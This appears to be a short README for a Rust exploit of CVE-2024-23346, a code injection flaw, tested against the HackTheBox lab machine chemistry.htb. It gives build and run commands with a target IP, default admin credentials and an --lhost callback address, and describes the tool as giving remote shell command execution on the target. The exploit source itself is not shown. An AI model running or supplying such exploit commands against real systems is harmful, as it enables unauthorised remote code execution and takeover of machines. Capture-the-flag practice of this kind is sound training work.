
A Rust exploit for CVE-2024-23346 that functions as a "terminal" (tested on chemistry.htb)
A Rust exploitation script for CVE-2024-23346.
As shown below the POC uses the code injection vulnerability and runs remote shell commands like in a Terminal.
Steps to run the exploit:
Cargo
cargo run -- --helpcargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19OR
cargo build -r (binary will be in target/release/poc)./poc --help./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19Exploit script is inspired from Python Scripting Expert MAWK0235